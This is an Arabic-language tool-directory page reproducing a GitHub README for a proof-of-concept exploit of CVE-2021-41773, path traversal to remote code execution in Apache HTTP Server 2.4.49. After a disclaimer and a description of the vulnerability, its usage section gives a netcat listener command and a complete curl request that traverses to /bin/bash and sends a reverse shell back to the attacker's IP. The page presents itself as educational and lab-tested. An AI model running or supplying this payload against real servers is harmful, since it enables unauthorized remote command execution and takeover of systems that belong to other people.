Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE — إثبات مفهوم تعليمي لـ CVE-2021-41773، يوضح اجتياز المسار إلى تنفيذ التعليمات البرمجية عن بُعد على Apache HTTP Server 2.4.49 مع حمولة قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/cyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubcyberquestor-infosec/cve-2021-41773-apache_2.4.49-path-traversal-to-rce

CVE-2021-41773-Apache_2.4.49-Path-traversal-to-RCE

إثبات مفهوم تعليمي لـ CVE-2021-41773، يوضح اجتياز المسار إلى تنفيذ التعليمات البرمجية عن بُعد على Apache HTTP Server 2.4.49 مع حمولة قشرة عكسية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
243منذ سنة واحدةلم تتم المراجعة بعد
مشاركة

CVE-2021-41773 – Apache HTTP Server 2.4.49 تنفيذ الأوامر عن بُعد

⚠️ إخلاء مسؤولية
هذا المستودع مخصص لأغراض تعليمية وبحثية فقط.
يمكن استخدام المعلومات والكود المقدم هنا في بيئات خاضعة للتحكم، مثل أجهزة المختبرات الخاصة.
الاستخدام غير المصرح به لهذا الكود ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.
المؤلف غير مسؤول عن أي إساءة استخدام أو أضرار ناتجة.


🔍 حول الثغرة الأمنية

CVE-2021-41773 تؤثر على خادم Apache HTTP Server الإصدار 2.4.49.
بسبب التحقق غير الصحيح من المدخلات في عملية تطبيع المسارات، يمكن للمهاجم استغلال ثغرة اجتياز المسار باستخدام أحرف مشفرة مثل %2e للوصول إلى ملفات عشوائية.
إذا كان CGI مفعّلاً، يمكن تصعيد هذه الثغرة إلى تنفيذ أوامر عن بُعد بدون مصادقة (RCE).

  • نوع الثغرة: اجتياز المسار إلى تنفيذ أوامر عن بُعد
  • الإصدار المتأثر: Apache 2.4.49
  • المصادقة المطلوبة: ❌ لا
  • الخطورة: حرجة
  • درجة CVSS: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

🧾 المراجع

  • استشارة Apache الأمنية
  • Exploit-DB – 50383
  • GitHub PoC
  • تقرير NVD CVE

  • 🛠 نظرة عامة على الاستغلال

    يتم إنشاء طلب curl خبيث لاستغلال ثغرة اجتياز المسار. عندما يكون CGI مفعّلاً، يمكن للمهاجمين الوصول إلى /bin/bash وتنفيذ أوامر شل عشوائية.
    في هذا المثال، يتم إرسال حمولة شل عكسية للحصول على وصول شل من الخادم.


    💥 العرض العملي

    تم اختبار هذا الاستغلال في بيئة مختبر خاصة. فيما يلي الخطوات والنتائج.

    1. اكتشاف إصدار Apache

    حدد فحص Nmap الهدف الذي يعمل بنظام Apache/2.4.49.

    Apache Version


    2. تنفيذ الاستغلال

    تم إرسال حمولة شل عكسية باستخدام أمر curl مُعد خصيصًا.

    Exploit Execution


    3. استلام الشل العكسي

    تم الحصول على شل عكسي بنجاح على جهاز المستمع الخاص بالمهاجم.

    Reverse Shell


    📂 استخدام الاستغلال

    الخطوة 1: تشغيل مستمع Netcat

    root@kitploit:~
    nc -nvlp 4444
    

    الخطوة 1: تشغيل الاستغلال

    root@kitploit:~
    curl -v 'http://<target>:<port>/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/<your-ip>/4444 0>&1' -H 'Content-Type: text/plain'
    

    ✔️ تأكد من:

    أن إصدار Apache هو 2.4.49

    أن CGI مفعّل

    أن المنفذ 4444 (أو المنفذ الذي اخترته) مفتوح عبر جدار الحماية

    📖 مدونة Medium

    اطّلع على الشرح التفصيلي والنظرية في مقالتي على Medium:
    👉 اقرأ المدونة على Medium

    تنزيل الأداة